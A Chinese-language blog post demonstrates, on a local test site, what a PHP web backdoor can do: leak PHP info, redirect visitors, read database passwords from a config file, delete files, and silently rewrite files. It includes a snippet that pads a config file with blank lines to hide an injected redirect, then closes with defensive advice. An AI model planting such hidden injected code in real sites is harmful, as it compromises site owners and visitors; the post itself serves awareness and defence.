文章詳情
黑客留下的網站后門能做什么?
今天來聊一聊服務器安全的問題。這幾天一直在著手服務器攻防問題,修復一些漏洞,寫代碼的人真的要注意安全問題。千萬不要相信用戶的輸入!今天用PHP 代碼展示一下危險。
測試準備
為了模擬,我在本地搭建了服務器環境,展示一個正常網站如何被攻擊。
首先修改電腦本地host文件。改了之后就可以用test.com虛擬域名訪問本地文件了。文件目錄在“C:\Windows\System32\drivers\etc”
網站目錄很簡單,如下:
在網站入口中,引用了數據庫配置文件,然后輸出一句話來模擬網站首頁。
在數據庫配置文件中,我參照當前流行的框架ThinkPHP數據庫配置文件,返回一個數據庫基本信息數組,包括數據庫的端口和密碼。
接下來就是我們的重頭戲,黑客后門文件。
你可能會覺得,就這?就這幾行代碼能干什么?
開始模擬攻擊
我們訪問一下我們的網站
網站可以正常訪問,沒有任何問題
訪問一下黑客文件,好像也沒有問題
1、輸出php版本信息
現在黑客已經知道你后臺php版本,裝了那些插件,數據庫用的是什么數據庫
2、網頁重定向
可以跳轉到 百度了,這表示,黑客已經搭好了一個運行代碼的環境?,F在通過你的網站,已經可以隨便寫一行代碼都可以執行了
3、讀取數據庫配置信息
已經把你的密碼什么的都弄到手了,你的網站什么數據,都可以修改了,怕不怕。甚至可以“刪庫跑路”!!
4、刪除文件
看:1.txt文件被刪除了
可以刪除你網站上的文件了
5、修改文件
?config= // 讀取數據庫配置文件 $info=file_get_contents("Conf/db.php"); // 設置很多個換行符號 $change=str_repeat("\r\n",50); // 用空格代替<?php $file= str_replace("<?php","",$info); // 你想添加的任何功能都可以寫在下面 $extCode="header('location:http://www.baidu.com');"; ... // 最后組合起來,保存回去 file_put_contents("Conf/db.php","<?php".$change.$extCode.$file);
來看看你的db.php文件是怎么改變的
在文件頭加入很多換行,你以為文件是空的,其實他已經在文件里加入一行跳轉代碼,無論別人怎么訪問你的網站.都會跳到他寫的網站去
攻擊 End
看完是不是大吃一驚?別慌:我們要如何防備呢?
- 不要相信用戶的輸入!不要相信用戶的輸入!不要相信用戶的輸入!
- 在獲取用戶輸入前一定要做過濾處理;
- 在服務器上,設置文件的權限,不要每個文件都可以執行腳本權限;
- 或者增加防篡改功能;
- 或者修改你服務器的安全組,修改22,21等默認端口,不要端口全開;
- 對整個站點進行掃描木馬。
上一文章:百度云不限速方法,不用任何軟件
下一文章:HTTP協議和HTTPS協議的區別詳解
相關推薦
- 10-20黑客游戲《黑客進化:不為人知的危機》下載
- 07-26最新一種過安全狗的webshell
- 12-21小風原創表白網站源碼
- 02-022022最新黑客高清壁紙下載
- 07-24關于黑客攻防的書籍免費打包下載
- 08-02王者榮耀免費送皮膚英雄?小風教你一秒識別釣
- 06-23小技巧:刪除遠程桌面連接IP記錄
- 04-20黑客三字經
- 07-25帶你全面了解ddos攻擊原理
- 08-03救回那些因死機后office Word來不及保存的文
- 03-29小風原創滲透教程18課
- 07-27反射型DDoS攻擊的原理_附防御方法
- 07-23暗網,一個比你想象中恐怖100倍的互聯網世界
- 07-26你的個人隱私是如何在微博上泄露的